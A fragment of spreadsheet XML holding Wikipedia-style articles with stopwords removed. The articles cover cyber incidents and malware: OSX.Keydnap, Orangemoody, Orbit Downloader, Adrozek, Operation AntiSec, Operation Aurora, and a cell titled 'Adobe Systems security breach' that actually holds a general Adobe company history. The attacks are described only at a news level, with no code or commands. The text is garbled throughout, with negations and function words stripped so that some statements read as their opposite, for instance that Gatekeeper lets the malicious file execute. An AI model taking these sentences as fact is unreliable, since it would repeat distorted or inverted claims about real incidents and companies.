app, successfully bypasses gatekeeper protection. detection removal activating gatekeeper easy prevent accidental installation osx.keydnap. user's gatekeeper activated, malicious file executed warning displayed user. this malicious mach-o file unsigned, automatically triggers warning gatekeeper. references</t>
  </si>
  <si>
    <t>Orangemoody editing of Wikipedia</t>
  </si>
  <si>
    <t>august 2015, english wikipedia community discovered sockpuppet accounts operating undisclosed paid editing ring. participants ring extorted money mid-sized businesses articles rejected encyclopedia's "articles creation" process, drafts submitted approval experienced editors. ring nicknamed "operation orangemoody" first account uncovered sockpuppet investigation wikipedia's biggest conflict-of-interest scandal june 2021, exceeding scope wiki-pr editing wikipedia incident approximately sockpuppets found blocked 2013. story reported many english language non-english language news sources, including komsomolskaya pravda, temps, monde zeit. editing described various media "black hat" editors (techcrunch), "dishonest editing" world), "extortion" (wired), "blackmail scam" (the independent), "extensive cybercrime syndicate" (thinkprogress). history 2015, administrators english wikipedia blocked accounts, many suspected sockpuppets group people, two-month investigation launched wikipedia editors. more wikipedia articles created accounts deleted.wikipedia's resulting investigation, named "orangemoody" first account uncovered, found sockpuppets searched site deleted rejected articles businesses individuals. many articles deleted excessive promotional content. editors, posing wikipedia administrators, would extort payment businesses publish protect articles. besides businesses, individuals targeted, including cuban musician dayramir gonzalez. scammers involved deletion articles. references external links erhart, barbara, juliet (august 2015). "hundreds "black hat" english wikipedia accounts blocked following investigation". wikimedia blog. wikimedia foundation. retrieved september 2015.</t>
  </si>
  <si>
    <t>Orbit Downloader</t>
  </si>
  <si>
    <t>orbit downloader discontinued download manager microsoft windows. launched 2006, developers abandoned 2009. 2013, orbit downloader classified malware antivirus software eset discovered botnet application. features main features program ability grab download embedded flash video files online video platforms. orbit downloader also accelerates downloads acting peer-to-peer client, utilizing bandwidth users. orbit downloader supports downloading http, https, ftp, metalink, rtsp, rtmp protocols. orbit downloader supports internet explorer, maxthon, mozilla firefox opera browsers. funding malicious conduct although orbit downloader free, advertising-supported product since offers change browser's homepage upon installation also offers install software critical operation. also begun display built-in inside program main window dialog finished download appears.on august 2013, welivesecurity blog, published eset security company, reported since version 4.1.1.15, orbit downloader includes botnet-like module performs ddos attacks without user's knowledge permission. because dubious behavior, detected malware. following report, download websites betanews, download.com, downloadcrew, majorgeeks, softpedia softonic disabled download. betanews attempted contact developers discovered last blog activity 2009 orbit community forum since left spammer. also comparison download managers real time messaging protocol references</t>
  </si>
  <si>
    <t>Adrozek</t>
  </si>
  <si>
    <t>adrozek malware injects fake online search results. microsoft announced malware threat december 2020, noted many different browsers affected, including google chrome, microsoft edge, mozilla firefox yandex browser. malware first detected 2020 and, peak august 2020, controlled 30,000 devices day. december 2020 announcement, microsoft claimed "hundreds thousands" infected devices worldwide september 2020.according microsoft, detected blocked, adrozek adds browser extensions, modifies specific target browser, changes browser settings insert additional, unauthorized pages, often legitimate search engines. user tricked clicking fake ads, scammers earn affiliate advertising dollars. malware observed extract device data and, cases, steal credentials, sending remote servers.users unintentionally install malware drive-by download, visiting tampered website, opening e-mail attachment, clicking deceptive link deceptive pop-up window. main malware program downloaded “programs files” folder using file names audiolava.exe, quickaudio.exe, converter.exe. according magazine, good avoid, mitigate, infection adrozek keep browser related software programs date. also drovorub mirai (malware) references external links adrozek (video; 1:38) microsoft announcement youtube</t>
  </si>
  <si>
    <t>Operation AntiSec</t>
  </si>
  <si>
    <t>operation anti-security, also referred operation antisec #antisec, series hacking attacks performed members hacking group lulzsec anonymous, others inspired announcement operation. lulzsec performed earliest attacks operation, first serious organised crime agency june 2011. soon after, group released information taken servers arizona department public safety; anonymous would later release information agency times. offshoot group calling lulzsecbrazil launched attacks numerous websites belonging government brazil energy company petrobras. lulzsec claimed retire group, july reconvened hack websites british newspapers times, posting fake news story death publication's owner rupert murdoch. anonymous released first cache operation june 2011, taken anti-cyberterrorism program united states department homeland security federal emergency management agency. they continued attacks arizona government. they also launched attacks governments brazil, zimbabwe, tunisia. their recent attacks large corporations, nato, various united states enforcement websites. anonymous used stolen credit card numbers police officers make unauthorized donations various causes. others also committed hacks name operation, including hack news twitter account post false news story assassination president united states barack obama attacks websites government entities various countries. groups involved published sensitive government corporate information, well email addresses, names, social security numbers, credit card numbers website users. enforcement launched investigations many attacks committed part operation antisec. least seven arrests made connection activities related operation, including arrests purported lulzsec members, provided lulzsec security vulnerability information, four alleged members antisec group inspired operation. background lulzsec hacking group formed 2011 came international prominence hacking websites public broadcasting service, sony, united states senate. initially, group claimed hack "for lulz" enjoy chaos follows intrusions. however, june 2011, group announced teaming hacking collective anonymous series attacks dubbed operation anti-security operation antisec. press release accompanying beginning operation called supporters steal publish classified government documents name antisec. major banks corporations also mentioned potential targets. though lulzsec disbanded group june 2011, members reported continuing operation within anonymous.the groups involved claim operation aims protest government censorship monitoring internet. lulzsec members also mention ending believe corrupt racial profiling copyright laws goal operation. drugs also given reason particular hacks. contrast, today described operation cyberwarfare targeting governments large corporations. lulzsec activities lulzsec launched first attacks operation serious organised crime agency, national enforcement agency united kingdom handles cybercrime. group launched distributed denial-of-service attack agency's website june, taking offline minutes. day, knocked website jianhua district qiqihar, china, offline.on june, group released large cache documents taken servers arizona department public safety. release, titled "chinga migra", roughly translating "fuck border patrol", including email addresses passwords hundreds documents marked "sensitive" "for official only". group claimed retaliation passage arizona 1070, leading unjust racial profiling. arizona complained release officer identities personal information families could families danger gave exposed security protection. response, mobilized arizona counter terrorism information center locked remote access department public safety email accounts.on june 2011, group released described last dump operation. release contained large amount information varied sources. included information numerous companies, including half gigabyte data telecommunications company at&amp;t addresses sony, viacom, disney, emi, universal. at&amp;t portion included information pertaining release lte, 90,000 personal phones used ibm, development ipad also contained 750,000 usernames password combinations, including 200,000 hackforums.net, 12,000 nato online bookstore, 500,000 online video game battlefield heroes, 50,000 various video game forums, irish private investigation company priority investigations. finally, internal manual engineers screencapture united states navy website navy.mil vandalized.on june, offshoot group calling lulzsecbrazil took website government brazil, brasil.gov.br, president brazil, presidencia.gov.br. they also targeted website brazilian energy company petrobras. june, claimed publish access codes passwords petrobras website along personnel profiles. however, company denied information stolen, group removed claim twitter feed hours later. group also published personal information president brazil dilma rousseff mayor paulo gilberto kassab.despite claiming retired, july lulzsec hacked website british newspaper sun. group redirected newspaper's website also-hacked redesign website another newspaper times, altering site resemble posting fake story claiming rupert murdoch died ingesting fatal dose palladium. they objected involvement news corporation, murdoch-owned company publishes times, large phone hacking scandal. hacked website also contained webcomic depicting lulzsec deciding carrying attack. group later redirected website twitter feed. news international released statement regarding attacks page statement appeared also redirected lulzsec twitter page eventually taken offline. group also released names phone numbers reporter others associated newspaper encouraged supporters call them. group included email address password former news international executive rebekah brooks. news corporation took websites offline precaution later day. anonymous activities june 2011 june 2011, anonymous published information relating cyberterrorism defense initiative's security network training initiative national education laboratory program, sentinel program, operation united states department homeland security federal emergency management agency. hack included information agency distributed 2009 contained resources publicly available hacking software, list federal bureau investigation bureau locations, details counter-hacking tools, form letters enforcement agencies used obtain user details internet service providers.on june, group released second collection documents stolen arizona department public safety operation anti-security. dubbed "chinga migra communique dos", "fuck border patrol message two", data file contained names, addresses, phone numbers, internet passwords, social security numbers dozen arizona police officers. also contained emails, voicemails, chat logs them; least instance included sexually explicit photographs officer's girlfriends. anonymous also claimed documents included officers forwarding racist chain emails, evidence unit officers using percocet, fraternal order police member also convicted offender. anonymous noted motivation stemmed desire make police officers "experience taste kind violence terror dish every basis."on day, group released information obtained various government sources. government data anguilla, passwords servers belonging government brazil, users zimbabwe government websites, data municipality mosman council included. mosman council dump included mainly publicly available information website well not-publicly-available prototype version website launched. they claimed also access zimbabwean government websites ending gov.zw. most information control given injection. anonymous claimed targeted brazil data manipulation zimbabwe controversial 2008 zimbabwean presidential election. they also gained control website belonging government tunisia. they replaced webpage graphic representing anonymous text reading "the internet last frontier corrupt governments spoil anonymous, lulzsec, people around world stepping name freedom". release also included file containing internal mapping viacom servers well passwords data umusic.com, website universal music group. they also released names 2,800 members black eagles paramilitary group. july 2011 july, anonymous targeted arizona enforcement publishing number backdoors could used access arizona police servers pastebin. arizona forced pull many websites offline time. websites affected included department public safety mariposa chapter fraternal order police. they also claimed found "anti-muslim" emails attack.on july, anonymous hacked database democratic party orange county, florida. they published partial membership list handbook precinct committee members. hack also considered part group's oporlando plan.on july, anonymous released document containing administrative usernames passwords apple inc. system used operate online technical support follow-up surveys. encrypted passwords taken database.anonymous launched dubbed "turkish takedown thursday" july. they posted internal data hundred websites brought replaced content them. sites normal pages replaced antisec logo message denouncing supposed attempts internet censorship turkish government. websites affected included children's hospital, government agencies. day, group released database dumps taken universities italy. days later, italian police arrested alleged members anonymous ranging group vowed revenge raids.on july, group claimed responsibility hacks federal, engineering firm contracts federal bureau investigation agencies united states federal government. internal database documents personnel email stolen attack. group also claimed vandalized firm's website forcing take offline. group says documents procured, found proposal firm produce "special identities modernization (sim) project" would help identify might present criminal terrorist risk future, fingerprinting contracts united states department justice, biometrics contracts military. they also claimed obtained information allowing various virtual private networks access panels belonging united states department energy. they also sent message company employees urging work government rather hack done simple injection.on july, anonymous hacked systems belonging defense contractor booz allen hamilton, breaking barriers group described security measures place." they released said 90,000 email accounts encrypted passwords united states central command, united states special operations command, united states marine corps, united states force, united states department homeland security, united states department state, various private sector contractors, calling released "military meltdown monday". they also sarcastically posted invoice charging company "security audit services rendered". despite anonymous' claims 90,000 emails released, associated press counted 67,000 unique emails, 53,000 military addresses. remainder addresses came educational institutions defense contractors. department defense said aware incident coordinating agencies response. booz allen confirmed intrusion july, contradicted anonymous' claims saying attack never past systems, meaning information military secure.on july, group attacked servers agricultural biotechnology company monsanto released information company's employees, including names, addresses, email addresses. group claimed performed attack protest company's lawsuits farmers manufacture organic milk effort stop stating label milk contain artificial bovine growth hormones. monsanto confirmed attack claimed percent information published came current former employees company. they said ninety percent email addresses names media contacts employees agricultural companies.on july, anonymous released pdfs purportedly taken servers belonging nato. they claimed twitter obtained around gigabyte data would release portions course days. group claimed data sensitive felt would irresponsible release, thus would make portion taken available. first documents released relate outsourcing communication information services (cis) kosovo funding request project.the austrian branch anonymous hacked website austrian gebühren info service, television license agency austrian national public service broadcaster, july. they accessed 214,000 records containing personal information stole banking data 96,000 people server. counter-terrorism bureau country launched investigation preparing file criminal complaints involved.on july, first posted confidential information claimed came italian centro nazionale anticrimine informatico protezione delle infrastrutture critiche, translated national anti-crime computer center critical infrastructure protection, agency tasked protecting vital computer systems country. twitter account @anonesc posted less megabytes data, claimed taken eight gigabytes. data related oil, nuclear, firms deemed involved "critical infrastructure", well government agencies including department defence australia.on july, anonymous hacked fbi-contractor mantech international. they posted résumé sent company proof infiltrated systems. anonymous claimed attack would first part promised "fuck friday", fff, campaign part larger operation antisec. they published megabytes content company later day. internal documents generally concern contracts mantech nato, nature anonymous claims shows waste taxpayer money. files also include dealings united states army list employee emails.on july, anonymous attacked websites different enforcement websites hosted server. much gigabytes data taken, including personal information police officers numerous jurisdictions. emails also taken, well confidential information inmates confidential informants, though released yet. anonymous said would redact inmate names would release names informants false impression would able 'anonymously' snitch secrecy." release also included demand arrested members anonymous released immediately. some information released, however, already publicly available. they proceeded release social security numbers police officers missouri sheriffs' association website. following saturday, august, released cache data websites title "shooting sheriffs saturday release" included information taken enforcement websites. large amounts personal information included, anonymous stating, sympathy officers informants endangered release personal information. long using abusing personal information." anonymous claimed motive revenge arrests number participants previous operations lulzsec anonymous member topiary. they also used stolen credit card numbers make donations american civil liberties union, electronic frontier foundation, chelsea manning support network. august 2011 august, anonymous gained access email account richard garcia, former assistant director charge field office angeles senior vice president vanguard defense industries, name antisec. they claimed firm's relationships united states military enforcement organizations made legitimate target part operation. they also claimed breached company's website, wordpress platform, though company says website never affected. group released gigabyte information three days later, taken garcia's personal email account; mainly related garcia's former role infragard. september 2011 retaliation arrests people allegedly participated operation antisec, especially topiary, anonymous attacked website texas police chiefs association. september, group defaced website released documents marked "law enforcement sensitive" "for official only". release also included police officer private email. day, group brought website united states court appeals ninth circuit justice system's characterization anonymous activities "cyber-terrorism". october 2011 october, announced dump data related enforcement support occupy wall street occupy movement. dump including data taken international association chiefs police, boston police patrolmen's association, sheriff's office baldwin county, alabama. number police websites virtually hosted together also content replaced anti-police video. dump megabytes information including membership rosters, internal documents, social security numbers international association chiefs police; nearly 1000 names, ranks, addresses, phone numbers, social security numbers police officers jefferson county, alabama, birmingham, alabama; 1000 names passwords members boston police patrolmen's association; financial information client list developer marketing company matrix group, business several enforcement clients. antisec claimed least enforcement related websites included attack. november 2011 november 2011, anonymous posted 38,000 email messages gmail account alfredo "fred" baclagan, special agent supervising computer crime investigations california department justice computer technology crime hightech response team, site pirate bay. they also added claimed baclagan's personal home address phone number. group claimed action part attack enforcement support occupy movement protest prosecution computer criminals general. they also claimed read text messages, listened voicemail, used google voice account call text friends family. they also purchased camera using google wallet. release includes forensic experts discussing techniques tracking cybercriminals different companies respond enforcement requests information. september 2012 september 2012, million unique device apple products published group associated anonymous. group claimed million part dataset 12.36 million records taken laptop. responded saying aware unauthorized data release.according technica article published september: digital publishing company named bluetoad come forward take responsibility leak million unique device identifiers (udids) previously attributed alleged laptop hack. number interviews published monday, bluetoad apologized public incident, explaining hackers broken company's systems order steal file. actions groups individuals original announcement operation anti-security included call lulzsec spread name "antisec" physical graffiti. days after, number locations mission beach, diego, vandalized pieces graffiti reading phrase. july, news twitter account (@foxnewspolitics) hacked false tweets reporting president united states barack obama shot three times killed sent account. script kiddies, group close ties anonymous including hackers former membership group, claimed responsibility attack hoax. group claimed action name operation anti-security would continue looking expose information corporations assist antisec." united states secret service investigating incident threat president. group subsequently hacked facebook page pharmaceutical company pfizer, claiming "moral reasons" part antisec. they posted numerous messages company's facebook wall mocking security. july, someone going name f1esc posted file pirate containing megabytes information described national election data" labelled #antisec. reality, data concerned 2011 south wales state election taken government website designed provide election results data publicly available, data proved freely accessible information instead hack. early july, group redhack hacked defaced 1000 websites based turkey. they claimed mark anniversary sivas massacre part operation anti-security. websites belonged agencies government turkey adnan oktar, islamic creationist. group vowed continue contribution antisec operation. july, hacker called p0keu released around 2,658 usernames, passwords hidden behind hash functions, email addresses blog tamilcanadian.com. gave reason chose website attack antisec label. july, leaked part stevens institute technology website database. least records database contained plain text files email addresses, user names, passwords site users. p0keu posted user information pastebin. p0keu continued hacking, labelled releases antisec slogan. netherlands, splinter group inspired lulzsec formed, calling antisec group hacked websites online dating service pepper.nl software company nimbuzz. four people believed police members later arrested. july, group called bashcrew hacked website house representatives philippines name antisec. names, telephone numbers, email addresses members filipino congress released pastebin, group claiming also release blood types private websites members. hacker going name thehacker12, self-purported antisec supporter member anonymous, released data stolen event management company allianceforbiz.com august 2011 mediafire pastebin. release contained spreadsheet usernames, email addresses, passwords, employers, information around 20,000 people, many united states government employees contractors. organization employees compromised small business administration. enforcement response enforcement agencies various countries arrested searched property alleged participants operation antisec. these suspects come different groups carried attacks part operation. july 2011, london metropolitan police announced arrest possible core lulzsec member t-flow. 16-year-old male arrested south london charges violating computer misuse part operation involving arrest several hackers affiliated anonymous united states united kingdom. day, arrested 21-year-old lance moore cruces, mexico. accused stealing thousands documents applications at&amp;t lulzsec published part so-called "final release" operation. lulzsec denied membership arrested, stating "there we're still here."on july, prosecutors netherlands released details arrests four suspects aged located different dutch cities accused part hacking group antisec operation participant inspired lulzsec. four, going online handles ziaolin, calimero, dutchd3v1l, time, arrested july computers electronic equipment confiscated evidence. prosecutors identified suspects computer security company fox-it helped gain access chat channel thought used group.the police central e-crime unit arrested 18-year-old shetland july 2011 suspected lulzsec member topiary. they also searched house interviewed 17-year-old lincolnshire possibly connected investigation. scotland yard later identified arrested yell, shetland resident jake davis. charged unauthorized access computer computer misuse 1990, encouraging assisting criminal activity serious crime 2007, conspiracy launch denial-of-service attack serious organised crime unit contrary criminal 1977, criminal conspiracy also criminal 1977. police confiscated dell laptop 100-gigabyte hard drive different virtual machines. details relating attack sony hundreds thousands email addresses passwords found computer. london court released davis bail conditions live curfew parents access internet. lawyer gideon cammerman stated that, client help publicize lulzsec anonymous attacks, lacks technical skills anything sympathizer.in early september 2011, scotland yard made arrests relating lulzsec. police arrested 24-year-old male mexborough, south yorkshire, 20-year-old male warminster, wiltshire. accused conspiring commit offenses computer misuse 1990; police said arrests related investigations lulzsec member kayla.on march 2012, great britain, united states, ireland charged connection alleged involvement lulzsec. revealed supposed lulzsec leader hector xavier monsegur, went username sabu, aiding enforcement since pleading guilty twelve counts, including conspiracy computer hacking, august 2011 part plea deal. exchange cooperation, federal prosecutors agreed prosecute monsegur computer hacking, also prosecute attempts sell marijuana, possession illegal handgun, purchasing stolen property, charging $15,000 former employer's credit card case identity theft, directing people prescription drugs illegal sources. still faces misdemeanor charge impersonating federal agent. five suspects charged conspiracy: jake davis, accused hacker "topiary" (who previously arrested); ryan ackroyd london, accused "kayla"; darren martyn ireland, accused "pwnsauce"; donncha o’cearrbhail ireland, accused "palladium"; jeremy hammond chicago, accused "anarchaos". while member lulzsec, authorities suspect hammond member anonymous charged access device fraud hacking relation supposed involvement december 2011 attack intelligence company stratfor part operation antisec. references external links official website greeksec's page</t>
  </si>
  <si>
    <t>Operation Aurora</t>
  </si>
  <si>
    <t>operation aurora series cyber attacks conducted advanced persistent threats elderwood group based beijing, china, ties people's liberation army. first publicly disclosed google january 2010, blog post, attacks began mid-2009 continued december 2009.the attack aimed dozens organizations, adobe systems, akamai technologies, juniper networks, rackspace publicly confirmed targeted. according media reports, yahoo, symantec, northrop grumman, morgan stanley, chemical also among targets. result attack, google stated blog plans operate completely uncensored version search engine china "within law, all," acknowledged possible, leave china close chinese offices. official chinese sources claimed part strategy developed u.s. government.the attack named "operation aurora" dmitri alperovitch, vice president threat research cybersecurity company mcafee. research mcafee labs discovered "aurora" part file path attacker's machine included malware binaries mcafee said associated attack. believe name internal name attacker(s) gave operation," mcafee chief technology officer george kurtz said blog post.according mcafee, primary goal attack gain access potentially modify source code repositories high-tech, security, defense contractor companies. "[the scms] wide open," says alperovitch. ever thought securing them, crown jewels companies many ways—much valuable financial personally identifiable data spend much time effort protecting." history january 2010, google revealed blog victim cyber attack. company said attack occurred mid-december originated china. google stated companies attacked; sources since cited organizations targeted. result attack, google said reviewing business china. day, united states secretary state hillary clinton issued brief statement condemning attacks requesting response china.on january 2010, news agency headline news reported united states congress plans investigate google's allegations chinese government used company's service human rights activists.in beijing, visitors left flowers outside google's office. however, later removed, chinese security guard stating "illegal flower tribute". chinese government issue formal response, although anonymous official stated china seeking information google's intentions. attackers involved technical evidence including addresses, domain names, malware signatures, factors, show elderwood behind operation aurora attack. "elderwood" group named symantec (after source-code variable used attackers), referred "beijing group" dell secureworks. group obtained google's source code, well access information chinese activists. elderwood also targeted numerous companies shipping, aeronautics, arms, energy, manufacturing, engineering, electronics, financial, software sectors.the "apt" designation chinese threat actors responsible attacking google apt17.elderwood specializes attacking infiltrating second-tier defense industry suppliers make electronic mechanical components defense companies. those firms become cyber "stepping stone" gain access top-tier defense contractors. attack procedure used elderwood infect legitimate websites frequented employees target company so-called "water hole" attack, lions stake watering hole prey. elderwood infects less-secure sites malware downloads computer clicks site. after that, group searches inside network infected computer connected, finding downloading executives' e-mails critical documents company plans, decisions, acquisitions, product designs. attack analysis blog posting, google stated intellectual property stolen. suggested attackers interested accessing gmail accounts chinese dissidents. according financial times, accounts used weiwei attacked, contents read copied; bank accounts investigated state security agents claimed investigation "unspecified suspected crimes". however, attackers able view details accounts details limited things subject line accounts' creation date.security experts immediately noted sophistication attack. days attack became public, mcafee reported attackers exploited purported zero-day vulnerabilities (unfixed previously unknown target system developers) internet explorer dubbed attack "operation aurora". week report mcafee, microsoft issued issue, admitted known security hole used since september. additional vulnerabilities found perforce, source code revision software used google manage source code.verisign's idefense labs claimed attacks perpetrated "agents chinese state proxies thereof".according diplomatic cable u.s. embassy beijing, chinese source reported chinese politburo directed intrusion google's computer systems. cable suggested attack part coordinated campaign executed "government operatives, public security experts internet outlaws recruited chinese government." report suggested part ongoing campaign attackers "broken american government computers western allies, dalai lama american businesses since 2002." according guardian's reporting leak, attacks "orchestrated senior member politburo typed name global version search engine found articles criticising personally."once victim's system compromised, backdoor connection masqueraded connection made connections command control servers running illinois, texas, taiwan, including machines running stolen rackspace customer accounts. victim's machine began exploring protected corporate intranet part searching vulnerable systems well sources intellectual property, specifically contents source code repositories. attacks thought definitively ended command control servers taken down, although known point whether attackers intentionally shut down. however, attacks still occurring february 2010. response aftermath german, australian, french governments publicly issued warnings users internet explorer attack, advising alternative browsers least security hole made. german, australian, french governments considered versions internet explorer vulnerable potentially vulnerable.in advisory january 2010, microsoft said attackers targeting google u.s. companies used software exploits hole internet explorer. vulnerability affects internet explorer versions windows vista, windows server 2003, server 2008 well service pack windows 2000 service pack 4.the internet explorer exploit code used attack released public domain, incorporated metasploit framework penetration testing tool. copy exploit uploaded wepawet, service detecting analyzing web-based malware operated computer security group university california, santa barbara. "the public release exploit code increases possibility widespread attacks using internet explorer vulnerability," said george kurtz, mcafee, attack. "the public computer code help cybercriminals craft attacks vulnerability compromise windows systems."security company websense said identified "limited public use" unpatched vulnerability drive-by attacks users strayed onto malicious sites. according websense, attack code spotted exploit went public last week. "internet explorer users currently face real present danger public disclosure vulnerability release attack code, increasing possibility widespread attacks," said george kurtz, chief technology officer mcafee, blog update. confirming speculation, websense security labs identified additional sites using exploit january according reports ahnlab, second spread instant messenger network misslee messenger, popular client south korea.researchers created attack code exploits vulnerability internet explorer (ie7) ie8—even microsoft's recommended defensive measure (data execution prevention (dep)) turned according dino zovi, security vulnerability researcher, "even newest safe attack running windows service pack (sp2) earlier, windows vista (release manufacturing), version microsoft shipped january 2007."microsoft admitted security hole used known since september. work update prioritized thursday, january 2010, microsoft released security patch aiming counter weakness, published exploits based number privately reported vulnerabilities. they state latter used published exploiters whether particular relation aurora operation, entire cumulative update termed critical versions windows, including windows security researchers continued investigate attacks. hbgary, security firm, released report claimed found significant markers might help identify code developer. firm also said code chinese language based could specifically tied government entity.on february 2010, security expert investigating cyber-attack google, claimed people behind attack also responsible cyber-attacks made several fortune companies past half years. they also tracked attack back point origin, seems chinese schools, shanghai jiao tong university lanxiang vocational school. highlighted york times, schools ties chinese search engine baidu, rival google china. both lanxiang vocational jiaotong university denied allegation.in march 2010, symantec, helping investigate attack google, identified shaoxing source 21.3% billion) malicious emails sent throughout world. also chinese intelligence activity countries chinese intelligence operations united states cyber-warfare economic industrial espionage ghostnet honker union titan rain vulcanbot muscular (surveillance program) references external links google china insiders helped attack news.cnet.com operation aurora beginning ultra-sophisticated hack attacks! sporkings.com january 2010 google trust company's standoff china might change future internet. rafal rohozinski interviewed jessica ramirez newsweek 2010.1.29 recent cyber attacks more meets eye? sporkings.com february 2010 ‘google’ hackers ability alter source code wired.com march 2010 'aurora' code circulated years english sites where's china connection? gross, michael joseph, "enter cyber-dragon", vanity fair, september 2011. bodmer, kilger, carpenter, jones, (2012). reverse deception: organized cyber threat counter-exploitation. york: mcgraw-hill osborne media. isbn 0-07-177249-9, isbn 978-0-07-177249-5 operation aurora internet explorer exploit live! mcafee operation aurora overview operation aurora explained cnet</t>
  </si>
  <si>
    <t>Adobe Systems security breach</t>
  </si>
  <si>
    <t>adobe inc. ə-doh-bee), originally called adobe systems incorporated, american multinational computer software company incorporated delaware headquartered jose, california. historically specialized software creation publication wide range content, including graphics, photography, illustration, animation, multimedia/video, motion pictures, print. flagship products include adobe photoshop image editing software; adobe illustrator vector-based illustration software; adobe acrobat reader portable document format (pdf); host tools primarily audio-visual content creation, editing publishing. adobe offered bundled solution products named adobe creative suite, evolved subscription software service (saas) offering named adobe creative cloud. company also expanded digital marketing software 2021 considered global leaders customer experience management (cxm).adobe founded december 1982 john warnock charles geschke, established company leaving xerox parc develop sell postscript page description language. 1985, apple computer licensed postscript laserwriter printers, helped spark desktop publishing revolution. adobe later developed animation multimedia acquisition macromedia, acquired adobe flash; video editing compositing software adobe premiere, later known adobe premiere pro; low-code development adobe muse; suite software digital marketing management. 2022, adobe 26,000 employees worldwide. adobe also major development operations united states newton, york city, arden hills, lehi, seattle, austin francisco. also major development operations noida bangalore india. history company started john warnock's garage. name company, adobe, comes adobe creek altos, california, behind warnock's house. that creek named type clay found (adobe spanish word mudbrick), alludes creative nature company's software. adobe's corporate logo features stylized designed graphic designer marva warnock, john warnock's wife. 2020, company updated visual identity, including updating logo single color, all-red logo warmer contemporary.steve jobs attempted company million 1982, warnock geschke refused. their investors urged work something jobs, agreed sell shares worth percent company. jobs paid five-times multiple company's valuation time, plus five-year license postscript, advance. purchase advance made adobe first company history silicon valley become profitable first year.warnock geschke considered various business options including copy-service business turnkey system office printing. then chose focus developing specialized printing software created adobe postscript page description language.postscript first truly international standard computer printing included algorithms describing letter-forms many languages. adobe added kanji printer products 1988. warnock geschke also able bolster credibility postscript connecting typesetting manufacturer. they able work compugraphic, worked linotype license helvetica times roman fonts (through linotron 100). 1987, postscript become industry-standard printer language third-party software programs licensing agreements printer companies.warnock described language "extensible", ability apply graphic arts standards office printing.adobe's first products postscript digital fonts, released proprietary format called type worked bill paxton left stanford. apple subsequently developed competing standard, truetype, provided full scalability precise control pixel pattern created font's outlines, licensed microsoft. mid-1980s, adobe entered consumer software market illustrator, vector-based drawing program apple macintosh. illustrator, grew firm's in-house font-development software, helped popularize postscript-enabled laser printers. adobe entered nasdaq composite index august 1986. revenue grown roughly billion 1999 billion 2012. adobe's fiscal years december november. example, 2020 fiscal year ended november 2020.in 1989, adobe introduced become flagship product, graphics editing program macintosh called photoshop. stable full-featured, photoshop ably marketed adobe soon dominated market. 1993, adobe introduced pdf, portable document format, adobe acrobat reader software. international standard: 32000-1:2008. december 1991, adobe released adobe premiere, adobe rebranded adobe premiere 2003. 1992, adobe acquired systems, inc. 1994, adobe acquired aldus corporation added pagemaker after effects product line later year; also controls tiff file format. year, adobe acquired lasertools corp compution inc. 1995, adobe added framemaker, long-document application, product line adobe acquired frame technology corp. 1996, adobe acquired ares software corp. 2002, adobe acquired canadian company accelio (also known jetform).in 2003, adobe purchased audio editing multitrack recording software cool edit syntrillium software $16.5 million, well large loop library called "loopology". adobe renamed cool edit "adobe audition" included creative suite. december 2005, adobe acquired main rival, macromedia, stock swap valued $3.4 billion, adding coldfusion, contribute, captivate, breeze (rebranded adobe connect), director, dreamweaver, fireworks, flash, flashpaper, flex, freehand, homesite, jrun, presenter, authorware adobe's product line.adobe released adobe media player april 2008. april adobe discontinued development sales older html/web development software, golive, favor dreamweaver. adobe offered discount dreamweaver golive users supports still golive online tutorials migration assistance. june adobe launched acrobat.com, series applications geared collaborative work. creative suite includes design, web, production premium, master collection came october 2008 configurations prices us$1,700 $2,500 individual application. windows version photoshop includes 64-bit processing. december 2008, adobe laid employees worldwide staff) citing weak economic environment. september 2009, adobe systems announced would acquire online marketing analytics company omniture $1.8 billion. deal completed october 2009. former omniture products integrated adobe marketing cloud. november 2009, company laid employees.adobe's 2010 marked continuing front-and-back arguments apple latter's non-support adobe flash iphone, ipad products. former apple steve jobs claimed flash reliable secure enough, adobe executives argued apple wish maintain control platform. april 2010, steve jobs published post titled "thoughts flash" outlined thoughts flash rise html july 2010, adobe bought software integrating line products: wcm, dam, soco, mobilein january 2011, adobe acquired demdex, inc. intent adding demdex's audience-optimization software online marketing suite. photoshop world 2011, adobe unveiled mobile photo service. carousel application iphone, ipad, uses photoshop lightroom technology users adjust fine-tune images platforms. carousel also allow users automatically sync, share browse photos. service later renamed "adobe revel".in october 2011, adobe acquired nitobi software, makers mobile application development framework phonegap. part acquisition, source code phonegap submitted apache foundation, became apache cordova.in november 2011, adobe announced would cease development flash mobile devices following version 11.1. instead, would focus html mobile devices. december 2011, adobe announced entered definitive agreement acquire privately held efficient frontier.in december 2012, adobe opened 280,000-square-foot (26,000 corporate campus lehi, utah.in 2013, adobe endured major security breach. vast portions source code company's software stolen posted online million records adobe's customers made readily available download. 2012, million sets payment card information compromised hack adobe.a class-action lawsuit alleging company suppressed employee compensation filed adobe, three silicon valley-based companies california federal district court 2013. 2014, revealed four companies, adobe, apple, google, intel reached agreement plaintiffs, 64,000 employees four companies, $324.5 million settle suit. march 2018, adobe summit, company nvidia publicized association quickly upgrade industry-driving profound learning innovations. expanding years coordinated effort, organizations work streamline adobe sensei machine learning structure nvidia gpus. joint effort speed time showcase enhance execution sensei-powered services adobe creative cloud experience cloud clients engineers. adobe nvidia co-operated years empowering quickening wide arrangement adobe's creative computerized encounter items. this incorporates sensei-powered features, example, auto lip-sync adobe character animator face-aware editing photoshop also cloud-based ai/ml items features, example, picture investigation adobe stock lightroom auto-labeling adobe experience supervisor.in 2018, adobe stated would e-commerce services provider magento commerce private equity firm permira $1.68 billion. this deal help bolster experience cloud business, provides services including analytics, advertising, marketing. deal closed june 2018.in september 2018, adobe announced acquisition marketing automation software company marketo.in october 2018, adobe officially changed name adobe systems incorporated adobe inc.in january 2019, adobe announced acquisition texturing company allegorithmic.in 2020, annual adobe summit canceled covid-19 pandemic. event took place online million total video views million visits event website. software giant imposed political features digital advert sales platform united states presidential elections approach.on november 2020, adobe announced spend us$1.5 billion acquire workfront, provider marketing collaboration software. acquisition completed early december 2020.on august 2021, adobe announced entered definitive agreement acquire frame.io, leading cloud-based video collaboration platform. transaction valued $1.275 billion closed fourth quarter adobe's 2021 fiscal year.on september 2021, adobe formally announced payment services e-commerce platform year, allowing merchants platform method accept payments including credit cards paypal. finances products digital marketing management software adobe marketing cloud, adobe experience manager (aem 6.2), documentation add-on (for aem), mixamo formats portable document format (pdf), pdf's predecessor postscript, actionscript, shockwave flash (swf), flash video (flv), filmstrip (.flm) web-hosted services adobe color, photoshop express, acrobat.com, behance adobe spark3d adobe aero, dimension, mixamo, substance adobe adobe renderer adobe media encoderadobe stock microstock agency presently provides million 